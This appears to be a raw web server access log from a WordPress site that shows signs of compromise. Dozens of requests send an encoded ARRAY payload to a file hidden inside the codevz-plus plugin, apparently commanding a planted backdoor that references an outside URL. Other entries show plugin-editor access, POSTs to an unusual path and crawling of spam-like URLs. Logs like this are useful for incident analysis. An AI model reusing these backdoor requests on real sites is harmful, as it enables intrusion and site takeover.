138.201.22.4 - - [21/Apr/2026:20:53:44 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383432342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343832342q3062643430633632623135396535613038613463613864353539376634306237222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:54:47 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383438372p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343838372q6633373230383931656461326365383533323735666661643132613261393137222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
70.35.205.237 - - [21/Apr/2026:20:50:54 +0000] "GET /wp-admin/plugin-editor.php?plugin=codevz-plus%2Fcodevz-plus.php&Submit=Select HTTP/1.1" 200 122462 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:56 +0000] "GET /wp-admin/plugin-editor.php?plugin=codevz-plus%2Fcodevz-plus.php&Submit=Select HTTP/1.1" 200 122451 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:50:58 +0000] "GET /wp-admin/plugin-editor.php?plugin=codevz-plus%2Fcodevz-plus.php&file=codevz-plus%2Fcodevz-plus.php&wp_scrape_key=27c1d6d9637f92856f335d8c288613bf&wp_scrape_nonce=243599858 HTTP/1.1" 200 8320 "-" "WordPress/6.9.4; https://www.smilepack.net"
70.35.205.237 - - [21/Apr/2026:20:50:58 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 6075 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:56 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 93 "https://www.smilepack.net/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:52:41 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383336312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343736312q6263616263323130376433386230613035326562363366383133353039383031222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
66.249.73.96 - - [21/Apr/2026:20:55:09 +0000] "GET /?z=fqvvswjb86n9gl4_gkind14524010 HTTP/1.1" 200 26125 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
138.201.22.4 - - [21/Apr/2026:20:53:23 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383430332p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343830332q3435633764303733663033633230613835313463633930303336326331643362222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
66.249.73.195 - - [21/Apr/2026:20:57:58 +0000] "GET /?z=e2uff7ivvrig44z HTTP/1.1" 200 27521 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
70.35.205.237 - - [21/Apr/2026:20:50:09 +0000] "HEAD / HTTP/1.1" 200 0 "https://www.smilepack.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
70.35.205.237 - - [21/Apr/2026:20:50:12 +0000] "HEAD / HTTP/1.1" 200 0 "https://www.smilepack.net/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:51:16 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383237362p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343637362q3730366264373431633662633133366532613530313938636334383335303362222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:51:37 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383239372p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343639372q3534316266616439613432633639366364313962396238613432356335336435222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:52:19 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383333392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343733392q3837363935333363346431353665303635656562626436656639376632656261222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:55:29 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383532392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343932392q3937663561623537333265383930363039303462336362613166656663636637222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:55:50 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383535302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343935302q6233636362363066633631306462373565303563643338363166326336333661222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:53:02 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383338322p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343738322q3565366166396464336663363364346235323832306464336265646266653732222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:54:05 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383434352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343834352q3135616661303865343831363631303639313766346164613230376265303264222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:54:26 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383436362p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343836362q6136356663326634373236626337633231623132646434636535383264323432222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:56:53 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383631332p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353031332q3364336362623965646433343233376361653661643461356334366665373931222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:57:35 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383635352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353035352q3561313430663663336665316662346131636635313965313735396534653739222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:56:11 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383537312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343937312q6433343038383434613063663837333761356266363339383762613531613465222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:57:57 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383637372p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353037372q3462376331333965643833653565643730383739623264656334366461633237222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
66.249.73.193 - - [21/Apr/2026:21:00:54 +0000] "GET /?z=fb3rogrb4x7h9ho HTTP/1.1" 200 26057 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.97 - - [21/Apr/2026:21:01:10 +0000] "GET /?z=fdp6mqdb2ph33fy_gkind14524022 HTTP/1.1" 200 25093 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
138.201.22.4 - - [21/Apr/2026:20:59:21 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383736312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353136312q3634623564633437623735336236393937613833636636656633623931623339222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
66.249.73.97 - - [21/Apr/2026:21:01:54 +0000] "GET /content.php?e=8349280318526 HTTP/1.1" 200 26654 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
138.201.22.4 - - [21/Apr/2026:21:00:03 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383830332p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353230332q3134663336643566663832363132616136623664306332333635393362633134222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
213.180.203.225 - - [21/Apr/2026:21:02:20 +0000] "GET /?z=f9vpswjb85n95l4 HTTP/1.1" 404 4621 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
138.201.22.4 - - [21/Apr/2026:20:55:08 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383530382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830343930382q3062663432333330663732656633303536366562633838356131373433613331222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:57:14 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383633342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353033342q3137336262326234373063663335363965326162643864653235616539326339222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
113.184.149.36 - - [21/Apr/2026:20:59:57 +0000] "GET /?z=eczo8onno8n9tl4 HTTP/1.1" 200 3737 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:59:00 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383734302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353134302q3131333962343831653335663839643864363134653830636536393138613465222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:59:42 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383738322p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353138322q6562343038323865353861333766303739653765656139613439636362666235222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:21:00:24 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383832342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353232342q3466633534633764656334653930376135323333393633663135633439373336222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
173.211.88.127 - - [21/Apr/2026:21:02:59 +0000] "POST /33c6wp/index.php HTTP/2" 200 18690 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
5.231.255.78 - - [21/Apr/2026:21:03:00 +0000] "POST /33c6wp/index.php HTTP/2" 200 19700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:58:18 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383639382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353039382q6331333734636466346637636537343461353433316262376265366231643630222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:58:39 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383731392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353131392q6633373364326163613535663439353338663030303364633265343538326631222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
66.249.73.98 - - [21/Apr/2026:21:01:08 +0000] "GET /?z=fgkjt98b9y0y1mh_gkind14524022 HTTP/1.1" 200 25912 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
138.201.22.4 - - [21/Apr/2026:21:00:45 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383834352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353234352q6233643435663132343431383464363939333539383636363730656165623935222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:21:02:30 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383935302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353335302q3963333237636464633434313761303732313939323431386163663161303036222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:21:02:51 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383937312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353337312q3165303032613830343931353432613931383435316364343333316339356666222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:21:01:06 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830383836362p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830353236362q3337396363303639646636346434356162356434393962333535643133623962222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
